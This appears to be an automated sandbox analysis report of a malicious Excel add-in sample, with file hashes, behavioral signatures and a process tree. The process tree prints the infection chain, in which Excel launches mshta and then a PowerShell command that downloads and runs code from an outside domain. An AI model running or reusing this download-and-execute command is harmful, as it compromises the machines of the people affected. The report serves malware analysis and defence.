Analysis
-
max time kernel
101s -
max time network
124s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-05-2024 07:59
Static task
static1
Behavioral task
behavioral1
Sample
393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll
Resource
win11-20240426-en
General
-
Target
393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll
-
Size
12KB
-
MD5
460bd6d522b0a9a99015e763bff25ab6
-
SHA1
cdaab1bf2071c7e71b2bd3c2a9ca83f94669eb3e
-
SHA256
393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056
-
SHA512
2d9f2b628fcb629b37ffa7fb848f1dfec3baac2a9ed66c4334ac7b9a9a7faf1d8ea813e62ad512340843bb5a815f10879e74522dc8451134c93d9b95b52294bb
-
SSDEEP
192:L9L29RBzDzeobchBj8JONrONdHruYrEPEjr7Ahs:Ll29jnbcvYJOILLuYvr7Cs
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3416 1016 mshta.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 4372 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid process 1016 EXCEL.EXE 1016 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1016 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4372 powershell.exe 4372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4372 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1016 EXCEL.EXE 1016 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
EXCEL.EXEpid process 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEmshta.exedescription pid process target process PID 1016 wrote to memory of 3416 1016 EXCEL.EXE mshta.exe PID 1016 wrote to memory of 3416 1016 EXCEL.EXE mshta.exe PID 1016 wrote to memory of 3416 1016 EXCEL.EXE mshta.exe PID 3416 wrote to memory of 4372 3416 mshta.exe powershell.exe PID 3416 wrote to memory of 4372 3416 mshta.exe powershell.exe PID 3416 wrote to memory of 4372 3416 mshta.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4372
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f754844cfb65838d1dd6b19dde5d835c
SHA1b3eb677783adc88c8d048898449e04d49f416db6
SHA2563644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6
SHA512f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf
-
C:\Users\Admin\AppData\Local\Temp\393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll
Filesize12KB
MD5460bd6d522b0a9a99015e763bff25ab6
SHA1cdaab1bf2071c7e71b2bd3c2a9ca83f94669eb3e
SHA256393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056
SHA5122d9f2b628fcb629b37ffa7fb848f1dfec3baac2a9ed66c4334ac7b9a9a7faf1d8ea813e62ad512340843bb5a815f10879e74522dc8451134c93d9b95b52294bb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82